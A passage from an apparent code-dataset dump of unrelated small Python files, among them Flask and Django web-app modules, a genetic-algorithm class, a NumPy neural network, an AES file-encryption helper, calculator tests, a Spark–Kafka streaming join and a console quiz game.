string\n##########\nfrom app.sustratos.models import Sustrato\nfrom app.unidadmedidas.models import Unidadmedida \nfrom flask_appbuilder.fields import AJAXSelectField\nfrom flask_appbuilder.fieldwidgets import Select2AJAXWidget, Select2SlaveAJAXWidget, Select2Widget\nfrom flask_appbuilder.models.sqla.interface import SQLAInterface\nfrom wtforms.ext.sqlalchemy.fields import QuerySelectField\nfrom wtforms import validators\n#### para la descarga + timestamp en nombre del archivo\nfrom flask_appbuilder import ModelView,expose,action\nfrom flask import redirect, send_file\nimport csv\nfrom io import BytesIO\nimport pandas as pd\nfrom datetime import datetime\nimport pytz\ntz = pytz.timezone('America/Argentina/Buenos_Aires')\nfecha = datetime.now(tz)\nfecha = fecha.strftime('%Y-%m-%d %H:%M')\nfecha = str(fecha)\n#############\n\n\nclass SustratoView(ModelView):\n datamodel = SQLAInterface(Sustrato)\n # estructura -> 'nombreAtributoModel':'nombre_a_Mostrar_en_Columna'\n label_columns = {\"nombreSustrato\":\"Sustrato\",\"descrpcionSustrato\":\"Descripcion\",\"unidadmedida\":\"Unidad de Medida\"}\n\n list_columns = [\"nombreSustrato\",\"descrpcionSustrato\",\"unidadmedida\"] #lista de columnas a mostrar en el listado\n\n # lista de campos y atributos a mostrar en el \"show\" de cada registro\n\n list_title = 'Lista de Sustratos'\n show_title = 'Detalle Sustrato'\n add_title = 'Nuevo Sustrato'\n edit_title = 'Editar Sustrato'\n\n base_permissions = ['can_list', 'can_show']\n @action(\"down_excel\",\"Descargar lista\",\"\",\"fa-file-excel-o\",single=False)\n def down_excel(self, items):\n output = BytesIO()\n list_items = list()\n excel_columns = SustratoView.list_columns\n\n for item in items:\n row = dict()\n for col,colname in self.label_columns.items():\n if col in excel_columns:\n row[colname] = str(getattr(item, col))\n else:\n pass\n list_items.append(row)\n\n df = pd.DataFrame(list_items)\n writer = pd.ExcelWriter(output, engine='xlsxwriter')\n df.to_excel(writer, 'data', index=False)\n writer.save()\n output.seek(0)\n\n return send_file(output, attachment_filename='lista_motores' +fecha+ '.xlsx', as_attachment=True)\n\n\n\nsustrato_builder = appbuilder.add_view(\n SustratoView,\n \"Sustrato\",\n icon=\"fa-balance-scale\",\n category=\"Sustrato\",\n category_icon=\"fa-industry\"\n)\n\nclass mermaView(BaseView):\n @expose('/chartMerma')\n @has_access\n def method3(self):\n url = \"/chartMerma\"\n return url\n\n \nchart_merma_builder = appbuilder.add_view(\n mermaView,\n \"Merma\",\n icon='fa-area-chart' ,\n href=\"/chartMerma\", \n category='Charts' ,\n category_icon=\"fa-area-chart\")","sub_path":"app/sustratos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"294120688","text":"from flask.ext.assets import Bundle\n\nfrom flask_spirits import spirits\n\n\njs_public = Bundle(\n spirits.js_jquery,\n spirits.js_bootstrap,\n spirits.js_magnific,\n spirits.js_davis,\n 'js/index.js'\n)\n\ncss_public = Bundle(\n spirits.css_bootstrap,\n spirits.css_magnific,\n 'css/bootstrap.cosmo.css',\n 'css/bootstrap.css',\n 'css/index.css'\n)","sub_path":"mongoyurts/assets.py","file_name":"assets.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"484884648","text":"\"\"\"This module contains questions that are asked during the rating process.\nIt also contains a model to link those questions to a rating decision job.\n\"\"\"\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nfrom .rating_decision import RatingDecision\n\nfrom simple_history.models import HistoricalRecords\n\n\nclass Stage(models.Model):\n\n def __str__(self):\n return '%s' % self.name\n\n name = models.CharField(\n db_index=True,\n max_length=100,\n blank=False,\n null=False\n )\n\n\nclass Question(models.Model):\n \"\"\"Model to represent the process that follows upon a rating decision\n that has been approved by the chair.\"\"\"\n\n def __str__(self):\n return '%s | %s | %s' % (\n self.stage,\n self.is_enabled,\n self.question,\n )\n\n stage = models.ForeignKey(\n Stage,\n on_delete=models.PROTECT,\n )\n\n is_enabled = models.BooleanField(default=False)\n\n question = models.CharField(\n db_index=True,\n max_length=255,\n blank=False,\n null=False\n )\n\n\nclass ControlQuestion(models.Model):\n \"\"\"Model to link a question with a rating decision.\"\"\"\n\n # Add version history to the model\n history = HistoricalRecords()\n\n class Meta:\n ordering = ('rating_decision', 'question__question',)\n\n def __str__(self):\n return '%s | %s | Answer: %s' % (\n self.rating_decision,\n self.question,\n self.answer_correct\n )\n\n # Link back to the RatingDecision\n rating_decision = models.ForeignKey(\n RatingDecision,\n on_delete=models.PROTECT,\n )\n\n answered_by = models.ForeignKey(\n User,\n on_delete=models.PROTECT,\n related_name=\"control_question_answered_by\",\n null=True,\n blank=True\n )\n\n # On what date and time was the rating published\n answered_on = models.DateTimeField(\n null=True,\n blank=True\n )\n\n question = models.ForeignKey(\n Question,\n on_delete=models.PROTECT\n )\n\n answer_correct = models.BooleanField(default=False)\n\n\n@receiver(post_save, sender=RatingDecision)\ndef create_questions(sender, instance, created, **kwargs):\n \"\"\"Create a process object whenever a rating decision\n object has been created.\"\"\"\n\n if created:\n\n active_questions = Question.objects.filter(is_enabled=True)\n\n for row in active_questions:\n\n ControlQuestion.objects.create(rating_decision=instance,\n question=row)\n","sub_path":"ncr_website/rating_process/models/questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"217979371","text":"import math\nimport random\n\n\nclass Individuo:\n\n def __init__(self, bits_x, min_x, max_x, bits_y, min_y, max_y): # Construtor da classe\n self.bits_x = bits_x\n self.min_x = min_x\n self.max_x = max_x\n \n self.bits_y = bits_y\n self.min_y = min_y\n self.max_y = max_y\n self.no_genes = self.bits_x + self.bits_y # tamanho da cadeia\n\n self.fitness = 0\n self.fitnessInverso = 0\n\n # Função para gerar o genoma (vetor binário) aleatório\n @staticmethod\n def random_genome(size):\n return [random.randrange(0, 2) for _ in range(0, size)]\n\n # função que calcula o valor de q, dado max, min e número de bits\n @staticmethod\n def getQ(max, min, n):\n return (max - min) / ((2**n) - 1)\n\n # função que calcula o número de bits necessários, dado max, min e q\n @staticmethod\n def getN(max, min, q):\n return math.floor(math.log(((max - min) / q) + 1) / math.log(2))\n\n # função que converte uma cadeia de binários em um número real\n @staticmethod\n def bin_dec(cadeia, inicio, fim):\n res = 0\n aux = 0\n for i in range(fim, inicio - 1, -1):\n res = res + (cadeia[i] * (2**aux))\n aux = aux + 1\n return res\n\n def getFitness(self): # funcao hipotetica de fitness\n pi = math.pi\n x_real = self.min_x + (self.getQ(self.max_x, self.min_x, self.bits_x)\n * self.bin_dec(self.genotipo, 0, self.bits_x - 1))\n y_real = self.min_y + (self.getQ(self.max_y, self.min_y, self.bits_y)\n * self.bin_dec(self.genotipo, self.bits_x, (self.bits_x + self.bits_y) - 1))\n return 20 + (x_real **2) + (y_real**2) - (10 * (math.cos(2 * pi * x_real) + math.cos(2 * pi * y_real)))\n\n def setCromossomoAleatorio(self):\n self.genotipo = self.random_genome(self.no_genes) # cadeia de bits\n\n # aplica o valor do fenotipo a funcao de fitness\n self.fitness = self.getFitness()\n self.fitnessInverso = 1 / (self.fitness + (10**-9))\n\n def setCromossomoPronto(self, crom):\n self.genotipo = crom\n\n # aplica o valor do fenotipo a funcao de fitness\n self.fitness = self.getFitness()\n self.fitnessInverso = 1 / (self.fitness + (10**-9))\n\n def imprime(self): # imprime a cadeia de bits\n letras = \"\"\n for i in range(self.no_genes):\n letras += str(self.genotipo[i])\n # print(self.genotipo[i], end=\"\", flush=True)\n print(letras)\n print('\\t', self.fitness)\n","sub_path":"Individuo.py","file_name":"Individuo.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"374283918","text":"\"\"\" A two layer NN with sigmoid output layer.\n\"\"\"\n\nimport numpy as np\n\n# Activation functions\ndef sigmoid(Z):\n\treturn 1/(1+np.exp(-Z))\n\ndef relu(Z):\n\treturn np.maximum(0, Z)\n\n# Initial setup: number of nodes in each layer\nn_input = 30\nn_hidden = 20\nn_output = 1\n\n# Metavariables\nlearning_rate = .001\nn_epochs = 1001\n\n# Random training data\nn_examples = 1000\nX = np.random.random((n_input, n_examples))\ny = np.random.randint(0, 2, n_examples)\n\n# Initialize weights and biasses\nW1 = np.random.random((n_hidden, n_input)) * .01 # now we don't have to transpose\nb1 = np.zeros((n_hidden, 1))\nW2 = np.random.random((n_output, n_hidden)) * .01\nb2 = np.zeros((n_output, 1))\n\n# Training\nfor epoch in range(n_epochs):\n\t# Forward propagation\n\tA0 = X\n\tZ1 = W1.dot(A0) + b1\n\tA1 = relu(Z1)\n\tZ2 = W2.dot(A1) + b2\n\tA2 = sigmoid(Z2)\n\n\t# Compute the cost\n\tcost = -np.mean(y * np.log(A2) + (1-y) * np.log(1-A2))\n\tif epoch % 100 == 0:\n\t\tprint('Epoch: {}, Cost: {}'.format(epoch, cost))\n\n\t# Back propagation: second layer\n\tdA2 = -np.divide(y, A2) + np.divide(1-y, 1-A2)\n\tdZ2 = dA2 * A2 * (1-A2)\n\tdW2 = 1/n_examples * np.dot(dZ2, A1.T)\n\tdb2 = 1/n_examples * np.sum(dZ2, axis=1, keepdims=True)\n\t# Back propagation: first layer\n\tdA1 = np.dot(W2.T, dZ2)\n\tdZ1 = dA1.copy()\n\tdZ1[A1 < 0] = 0 # derivative of relu\n\tdW1 = 1/n_examples * np.dot(dZ1, A0.T)\n\tdb1 = 1/n_examples * np.sum(dZ1, axis=1, keepdims=True)\n\t\n\t# Update the weights and biasses\n\tW1 -= learning_rate * dW1\n\tb1 -= learning_rate * db1\n\tW2 -= learning_rate * dW2\n\tb2 -= learning_rate * db2","sub_path":"neural-networks/twolayer_sigmoid.py","file_name":"twolayer_sigmoid.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"625860652","text":"'''加密解密模块'''\n\n# http://www.pycrypto.org/\n# https://www.dlitz.net/software/pycrypto/\n\nimport lzma\nimport pickle\nimport os.path\n\nimport config.information\n\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\n\n\nclass Crypt():\n '''加密类'''\n\n def __init__(self):\n pass\n\n def bytekey(self, key):\n '''密钥key 长度必须为16(AES-128),#24(AES-192),或者32 (AES-256)Bytes 长度'''\n return (key.encode(encoding=\"utf-8\") + b'\\x00' * 32)[0:32]\n\n def encrypt(self, key, btxt):\n '''加密'''\n bkey = self.bytekey(key)\n biv = Random.new().read(AES.block_size)\n cipher = AES.new(bkey, AES.MODE_CFB, biv)\n bcrypt = cipher.encrypt(btxt)\n return (biv, bcrypt)\n\n def decrypt(self, key, biv, bcrypt):\n '''解密'''\n bkey = self.bytekey(key)\n cipher = AES.new(bkey, AES.MODE_CFB, biv)\n return cipher.decrypt(bcrypt)\n\n def encryptfile(self, key, srcfile, destfile):\n '''加密文件'''\n with open(srcfile, 'rb') as srcf:\n srcdata = srcf.read()\n compressdata = lzma.compress(srcdata)\n outdata = self.encrypt(key, compressdata)\n with open(destfile, 'wb') as desf:\n pickle.dump(outdata, desf)\n\n def loadencryptfile(self, key, enctryptfile):\n '''载入加密文件并解密'''\n with open(enctryptfile, 'rb') as ecf:\n biv, bcrypt = pickle.load(ecf)\n compressdata = self.decrypt(key, biv, bcrypt)\n data = lzma.decompress(compressdata)\n return data\n\n def encryptpyfile(self, key, pyfile, pyname):\n '''加密py文件,并且放在加密py路径中'''\n destfile = os.path.join(\n config.information.get_crypt_py_path(), pyname + '.bin')\n self.encryptfile(key, pyfile, destfile)\n\n def loadencryptpyfile(self, key, pyname):\n '''载入加密的py文件'''\n eptpyfile = os.path.join(\n config.information.get_crypt_py_path(), pyname + '.bin')\n return self.loadencryptfile(key, eptpyfile)\n\n def encrypttxtfile(self, key, txtfile, txtname):\n '''加密py文件,并且放在加密py路径中'''\n destfile = os.path.join(\n config.information.get_crypt_txt_path(), txtname + '.bin')\n self.encryptfile(key, txtfile, destfile)\n\n def loadencrypttxtfile(self, key, txtname):\n '''载入加密的py文件'''\n epttxtfile = os.path.join(\n config.information.get_crypt_txt_path(), txtname + '.bin')\n return self.loadencryptfile(key, epttxtfile)\n\n\n","sub_path":"python/kits/crypt.py","file_name":"crypt.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"104062135","text":"import pytest\nfrom lab_11.tasks.tools.calculator import (\n Calculator,\n CalculatorError,\n EmptyMemory,\n NotNumberArgument,\n WrongOperation,\n)\n\n@pytest.fixture(scope='function')\ndef calculator():\n return Calculator()\n\n@pytest.mark.parametrize(\n \"operator, arg1, arg2, expected\", [\n (\"+\", 1, 1, 2),\n (\"-\", 5, 2, 3),\n (\"*\", 10, 2, 20),\n (\"/\", 10, 2, 5),\n ('/', 2.2, 1.1, 2.0),\n ('*', complex(2, 3), complex(2, 3), complex(-5, 12)),\n ('+', complex(2, 3), 1, complex(3, 3))\n ]\n)\ndef test_run_operation(calculator, operator, arg1, arg2, expected):\n assert calculator.run(operator, arg1, arg2) == expected\n\n@pytest.mark.parametrize(\n \"operator, arg1, arg2, expected\", [\n (\"+\", 2, \"a\", NotNumberArgument),\n (\"+\", \"a\", 2, NotNumberArgument),\n (\"+\", \"a\", \"a\", NotNumberArgument),\n (\"^\", 2, 6, WrongOperation),\n (342, 1, 1, WrongOperation),\n (\"/\", 2, None, EmptyMemory),\n (\"/\", 2, 0, CalculatorError)\n ]\n)\ndef test_run_exception(calculator, operator, arg1, arg2, expected):\n with pytest.raises(expected):\n calculator.run(operator, arg1, arg2)\n\ndef test_run_memory(calculator):\n with pytest.raises(EmptyMemory):\n calculator.memory\n calculator.run('+', 1, 1)\n calculator.memorize()\n assert calculator.memory == 2\n assert calculator.in_memory() == print(f\"Zapamiętana wartość: 2\")\n calculator.clean_memory()\n with pytest.raises(EmptyMemory):\n calculator.memory\n calculator.in_memory()","sub_path":"lab_11/tasks/tests/tests_task1.py","file_name":"tests_task1.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"244158198","text":"count = 0\n\nwhile count <= 9999: \n\tcount = count + 1\n\n\tif (count%3==0 and count%5==0):\n\t\tprint (\"fizzbuzz\")\n\t\tcontinue\n\n\tif count%3 == 0:\n\t\tprint(\"fizz\")\n\t\tcontinue\n\n\tif count%5 == 0:\n\t\tprint (\"buzz\")\n\t\tcontinue\n\t\n\telse:\n\t\tprint(count)\n\n\n","sub_path":"fizzbuzz.py","file_name":"fizzbuzz.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"135729175","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import from_json, to_json, col, unbase64, base64, split, expr\nfrom pyspark.sql.types import StructField, StructType, StringType, BooleanType, ArrayType, DateType\n# this is a manually created schema - before Spark 3.0.0, schema inference is not automatic\n# since we are not using the date or the amount in sql calculations, we are going\n# to cast them as strings\n# {\"truckNumber\":\"5169\",\"destination\":\"Florida\",\"milesFromShop\":505,\"odomoterReading\":50513}\nvehicleStatusSchema = StructType (\n [\n StructField(\"truckNumber\", StringType()),\n StructField(\"destination\", StringType()),\n StructField(\"milesFromShop\", StringType()),\n StructField(\"odometerReading\", StringType()) \n ] \n)\n\n# {\"reservationId\":\"1601485848310\",\"locationName\":\"New Mexico\",\"truckNumber\":\"3944\",\"status\":\"In\"}\nvehicleCheckinSchema = StructType (\n [\n StructField(\"reservationId\", StringType()),\n StructField(\"locationName\", StringType()),\n StructField(\"truckNumber\", StringType()),\n StructField(\"status\", StringType()) \n ]\n)\n\n# the source for this data pipeline is a kafka topic, defined below\nspark = SparkSession.builder.appName(\"vehicle-checkin\").getOrCreate()\nspark.sparkContext.setLogLevel('WARN')\n\nvehicleStatusRawStreamingDF = spark \\\n .readStream \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", \"localhost:9092\") \\\n .option(\"subscribe\",\"vehicle-status\") \\\n .option(\"startingOffsets\",\"earliest\")\\\n .load() \n\n#it is necessary for Kafka Data Frame to be readable, to cast each field from a binary to a string\nvehicleStatusStreamingDF = vehicleStatusRawStreamingDF.selectExpr(\"cast(key as string) key\", \"cast(value as string) value\")\n\n# this creates a temporary streaming view based on the streaming dataframe\n# it can later be queried with spark.sql, we will cover that in the next section \nvehicleStatusStreamingDF.withColumn(\"value\",from_json(\"value\",vehicleStatusSchema))\\\n .select(col('value.*')) \\\n .createOrReplaceTempView(\"VehicleStatus\")\n\n# Using spark.sql we can select any valid select statement from the spark view\nvehicleStatusSelectStarDF=spark.sql(\"select truckNumber as statusTruckNumber, destination, milesFromShop, odometerReading from VehicleStatus\")\n\nvehicleCheckinRawStreamingDF = spark \\\n .readStream \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", \"localhost:9092\") \\\n .option(\"subscribe\",\"check-in\") \\\n .option(\"startingOffsets\",\"earliest\")\\\n .load() \n\n#it is necessary for Kafka Data Frame to be readable, to cast each field from a binary to a string\nvehicleCheckinStreamingDF = vehicleCheckinRawStreamingDF.selectExpr(\"cast(key as string) key\", \"cast(value as string) value\")\n\n# this creates a temporary streaming view based on the streaming dataframe\n# it can later be queried with spark.sql, we will cover that in the next section \nvehicleCheckinStreamingDF.withColumn(\"value\",from_json(\"value\",vehicleCheckinSchema))\\\n .select(col('value.*')) \\\n .createOrReplaceTempView(\"VehicleCheckin\")\n\n# Using spark.sql we can select any valid select statement from the spark view\nvehicleCheckinSelectStarDF=spark.sql(\"select reservationId, locationName, truckNumber as checkinTruckNumber, status from VehicleCheckin\")\n\n# Join the bank deposit and customer dataframes on the accountNumber fields\ncheckinStatusDF = vehicleStatusSelectStarDF.join(vehicleCheckinSelectStarDF, expr(\"\"\"\n statusTruckNumber = checkinTruckNumber\n\"\"\" \n))\n\n# this takes the stream and \"sinks\" it to the console as it is updated one message at a time:\n#. +-------------+------+--------------------+------------+--------------+\n#. |accountNumber|amount| dateAndTime|customerName|customerNumber|\n#. +-------------+------+--------------------+------------+--------------+\n#. | 335115395|142.17|Oct 6, 2020 1:59:...| Jacob Doshi| 335115395|\n#. | 335115395| 41.52|Oct 6, 2020 2:00:...| Jacob Doshi| 335115395|\n#. | 335115395| 261.8|Oct 6, 2020 2:01:...| Jacob Doshi| 335115395|\n#. +-------------+------+--------------------+------------+--------------+\n\ncheckinStatusDF.writeStream.outputMode(\"append\").format(\"console\").start().awaitTermination()\n\n","sub_path":"workspace_1/.ipynb_checkpoints/vehicle-checkin.solution-checkpoint.py","file_name":"vehicle-checkin.solution-checkpoint.py","file_ext":"py","file_size_in_byte":4652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"416394549","text":"#-*- coding: utf-8 -*-\nfrom django.conf.urls import patterns, url\nfrom comparator.models import Car\n\ncars = Car.objects.all()\n\nurlpatterns = patterns('comparator.views',\n\turl(r'^$', 'home'),\n\turl(r'^car/cars$', 'display_cars'),\n\turl(r'^car/(?P\\d+)$', 'display_car'),\n\turl(r'^car/add$', 'add_car'),\n\turl(r'^car/edit/(?P\\d+)$', 'edit_car'),\n\turl(r'^car/compare$', 'compare'),\n\turl(r'^car/compare_cars/$', 'compare_cars'),\n)\n","sub_path":"comparator/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"483620968","text":"#Round1Math Game: asks a series of simple maths questions and scores answers, layers of complexity include speed, operator difficulty, memory element\n\nimport random\nimport operator\nimport time\nimport replit\nimport threading\n\n#Beginning - Greeting\nname = input(\"What is your name? \")\ntime.sleep(1)\n\n#Instructions\nprint(f\" \\n{name}, beat the timer and answer atleast 5 questions correctly\")\nprint('\\nL E V E L 1!!! ')\ntime.sleep(2)\nprint(\"Good Luck, I hope you know your math well\", name, \"!\")\n\nloss = 0\nscore = 0\ntime.sleep(2)\nprint(f\"Your score is {score}!\")\n\n#Dictionary of operators\noperators = { \n '+': operator.add, \n '-': operator.sub,\n 'x': operator.mul,\n #'/': operator.truediv,\n}\n#function that generates a random maths question and then checks to see whether user answer is equal to true answer\ndef random_question():\n num_1 = random.randint(1,10)\n num_2 = random.randint(1,10)\n\n operation = random.choice(list(operators.keys()))\n print('\\nWhat is '+ str(num_1) + operation + str(num_2) +'?')\n player_answer = input()\n answer = operators[operation](num_1,num_2)\n\n if float(player_answer) == answer:\n print('Correct!')\n global score\n score += 1 \n else:\n print('Incorrect!')\n global loss\n loss +=1\n \n print(f\" Your score is {score}!\")\n\ninput('\\nPress enter to continue')\n#10 second timer \ndef timer(): \n global my_timer\n my_timer = 10\n for x in range(10):\n my_timer = my_timer - 1\n time.sleep(1)\n print('Out of Time!')\n \n#allows two functions to run concurrently (random_question&timer)\ncountdown_thread = threading.Thread(target = timer)\ncountdown_thread.start()\n\n#ask random question as long as timer is non zero, win-lose scenario\nwhile my_timer > 0:\n random_question()\n print(f\"{my_timer} seconds left!\")\n if score > 4 and my_timer == 0:\n time.sleep(2)\n print(\"YOU WON! But wait...\")\n time.sleep(1.5)\n print(f\"So you know your math, lets hope you know your capitals. Time for the next game!\")\n time.sleep(5)\n input('\\nPress enter to continue')\n replit.clear()\nif score < 5:\n print('You loser!!!')\n quit()\n\n# *************Game 2 : Remember the Colours*************\n\n#Players have to remember the random colour sequence and input answers when prompted, three rounds; round one- 3 colours, round two- 7 colours, round three- 12 colours\nprint('\\nL E V E L 2!!! ')\nprint(f\" \\n{name},your task is to try & remember the colours in order\")\n\nscore = 0\nloss = 0\ntime.sleep(2)\n\nprint(f\"\\nYour score is {score}, win all 3 rounds to win the game \")\n\ntime.sleep(2)\n\nprint(\"\\nI hope you've got a good memory \" + name + \"!\")\ninput('\\nPress enter to continue')\n\n\n#Timer\ndef countdown(t):\n\n while t:\n mins, secs = divmod(t, 5)\n timer = '{:02d}:{:02d}'.format(mins, secs)\n print(timer, end=\"\\r\")\n time.sleep(1)\n t -= 1\n\n print('Lets go!!')\n\n\n# 3 second countdown\ncountdown(int(3))\n\n\n#Flashes a list of colours in terminal one by one\ndef overprint(colour_list, t=1, char=\" \"):\n for i in range(len(colour_list)):\n time.sleep(t)\n print(\n '\\r{0:{1}<{2}}'.format(colour_list[i], char,\n len(colour_list[i - 1])),\n end=\"\\r\")\n time.sleep(t)\n print('\\r{0:{1}<{2}}'.format(\" \", char, len(colour_list[-1])), end=\"\\r\")\n\n\nColours = [\n 'red', 'blue', 'green', 'purple', 'yellow', 'orange', 'black', 'white',\n 'pink'\n]\n#Generate a random list of n colours from list Colours and feed into overprint. Checks to see if user recalls colours correctly for 3 rounds of increasing difficulty.\nfor i in range(1, 4):\n time.sleep(1)\n print('\\n' 'Round', i)\n colours_shown_to_player = random.sample(Colours, 2 * i + 1)\n overprint(colours_shown_to_player)\n\n print('\\nWhat colours were just shown to you?')\n user_answer = input()\n\n if user_answer.replace(',', ' ').lower().split(\n ) == colours_shown_to_player: #' '.join(round_answer):\n print('Correct!')\n score += 1\n else:\n print('Incorrect!')\n loss += 1\n\n print(f\"Your score is {score}\")\n\n#User can only win game if they win all 3 rounds\nif loss > 0:\n print('YOU LOSE! Try Again')\n input('\\nPress enter to continue')\n replit.clear()\n\nelse:\n print('YOU WIN!! Please speak to Muhammed to claim your £1000 amazon voucher!')\n input('\\nPress enter to continue')\n replit.clear()\n\n\n# *************Game 3 : Guess the Capitals*************\n\n#Greeting\nprint(f\"\\nL E V E L 3!!! I hope you know your capitals well {name}!\")\nprint(f\" \\nAnswer 5 questions {name} to win this game!\")\n\nscore = 0\nprint(f\"Oh also, your score is {score} \" + name)\ninput('\\nPress enter to continue')\n\nloss = 0\n\n#Dictionary with Countries & Cities\nCountries = {\n 'England': 'London',\n 'Spain': 'Madrid',\n 'Japan': 'Tokyo',\n 'China': 'Beijing',\n 'India': 'New Delhi',\n 'Nigeria': 'Abuja',\n 'Ireland': 'Dublin',\n 'Australia': 'Canberra',\n 'Turkey': 'Ankara',\n 'Sweden': 'Stockholm',\n 'Italy': 'Rome',\n 'Russia': 'Moscow',\n 'Egypt': 'Cairo',\n 'Syria': 'Yemen',\n 'South Africa': 'Johannesburg',\n 'Gambia': 'Banjul',\n 'Brazil': 'Rio',\n 'Chile': 'Santiago',\n 'Canada': 'Ottawa',\n 'USA': 'Washington DC',\n 'Ghana': 'Accra',\n 'Rwanda': 'Kigali',\n 'Cameroon': 'Yaounde',\n 'Norway': 'Oslo',\n 'UAE': 'Abu Dhabi',\n 'Germany': 'Berlin',\n 'Israel': 'Tel Aviv'\n}\n\n\n# Function will choose one random word from this list of countries\ndef capital_question():\n time.sleep(1)\n Random_Country = random.choice(list(Countries.keys()))\n print(f\"\\nGuess the capital of {Random_Country}!\")\n user_answer = input()\n\n if str(user_answer) == Countries[Random_Country]:\n print('Correct!')\n global score\n score += 1\n else:\n print('Incorrect!')\n global loss\n loss += 1\n print(f\"Your score is {score}, you have {3 - loss} chance(s) left\")\n\n\n#Loop the whole game\nfor i in range(10):\n capital_question()\n if score > 4:\n replit.clear()\n break\n print('YOU WIN!')\n input('\\nPress enter to continue')\n replit.clear()\n if loss > 2:\n print('YOU LOSE')\n input('\\nPress enter to continue')\n replit.clear()\n break\n\n#Bonus Game - Rock Paper Scissors\n\n#Rock Paper Scissors\n\n#Greet the player and ask for their name.\n#The player must input rock paper or scissors\n#Make game randomly show rock paper or scissors\n\n#Options\n\n#Rock\n#If player puts rock and computer puts scissors player wins computer loses a point\n#If player puts rock and computer puts paper player loses a point and computer wins\n#If player puts rock and computer puts rock call a tie for that round\n\n#Scissors\n# If player puts scissors and computer puts rock player loses\n# If player puts scissors and computer puts paper player wins and computer loses\n# If player puts scissors and computer puts scissors call tie\n\n#Paper\n#If player puts paper and computer puts rock player wins round and computer loses\n# If player puts paper and computer puts scissors player loses and computer wins\n# If player puts paper and computer puts paper call tie\n\n#Once players score is >4 then player wins\n#Once players loss is >2 then player loses.\n#Loop the game again for 5 times!\n\nscore = 0\nloss = 0\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"479940489","text":"class Estudiante: \r\n def __init__ (self, nombre, apellido, edad, codigo, semestre, cedula, carrera, direccion, celular): \r\n self.nombre=nombre \r\n self.apellido=apellido \r\n self.edad=edad \r\n self.codigo=codigo \r\n self.semestre=semestre \r\n self.cedula=cedula \r\n self.carrera=carrera \r\n self.direccion=direccion \r\n self.celular=celular\r\n def listaAlumno (self, listadoAlumno):\r\n\r\n listadoAlumno[self.codigo]=[self.nombre, self.apellido, self.edad, self.codigo,\r\n self.semestre, self.cedula, self.carrera, self.direccion, self.celular]\r\n #print (listadoAlumno)\r\n return listadoAlumno\r\n\r\n def mostrarCod(self):\r\n return self.cod \r\nclass Nivel: \r\n def __init__(self, t, q1,q2,ex): \r\n self.t=t \r\n self.q1=q1 \r\n self.q2=q2 \r\n self.ex=ex\r\n def listaNiv (self, listadoNiv, codigo):\r\n\r\n listadoNiv[codigo]=[self.t, self.q1, self.q2, self.ex]\r\n #print (listadoNiv)\r\n return listadoNiv\r\n def visualizar(self, listadoNiv1, listadoNiv2, listadoNiv3, listadoNiv4, listadoNiv5):\r\n print(\"Notas del Nivel 1: \")\r\n print(listadoNiv1)\r\n print(\"Notas del Nivel 2: \")\r\n print(listadoNiv2)\r\n print(\"Notas del Nivel 3: \")\r\n print(listadoNiv3)\r\n print(\"Notas del Nivel 4: \")\r\n print(listadoNiv4)\r\n print(\"Notas del Nivel 5: \")\r\n print(listadoNiv5)\r\n def cambiar(self, listadoNiv1,listadoNiv2,listadoNiv3,listadoNiv4,listadoNiv5,cod):\r\n l1=[]\r\n print(\"Elija el nivel que desea cambiar\")\r\n print(\"1. Nivel 1\")\r\n print(\"2. Nivel 2\")\r\n print(\"3. Nivel 3\")\r\n print(\"4. Nivel 4\")\r\n print(\"5. Nivel 5\")\r\n opc=input()\r\n print(\"Elija componente: \")\r\n print(\"1. Taller\")\r\n print(\"2. Quiz 1\")\r\n print(\"3. Quiz 2\")\r\n print(\"4. Examen\")\r\n notaCambio=input()\r\n nuevaNota=float(input(\"┐Que nota es?: \"))\r\n if opc==\"1\":\r\n l1=listadoNiv1[cod]\r\n if notaCambio==\"1\":\r\n l1[0]=nuevaNota\r\n listadoNiv1[cod]=l1\r\n elif notaCambio==\"2\":\r\n l1[1]=nuevaNota\r\n listadoNiv1[cod]=l1\r\n elif notaCambio==\"3\":\r\n l1[2]=nuevaNota\r\n listadoNiv1[cod]=l1\r\n elif notaCambio==\"4\":\r\n l1[3]=nuevaNota\r\n listadoNiv1[cod]=l1\r\n print (listadoNiv1)\r\n elif opc==\"2\":\r\n l1=listadoNiv2[cod]\r\n if notaCambio==\"1\":\r\n l1[0]=nuevaNota\r\n listadoNiv2[cod]=l1\r\n elif notaCambio==\"2\":\r\n l1[1]=nuevaNota\r\n listadoNiv2[cod]=l1\r\n elif notaCambio==\"3\":\r\n l1[2]=nuevaNota\r\n listadoNiv2[cod]=l1\r\n elif notaCambio==\"4\":\r\n l1[3]=nuevaNota\r\n listadoNiv2[cod]=l1\r\n print (listadoNiv2)\r\n elif opc==\"3\":\r\n 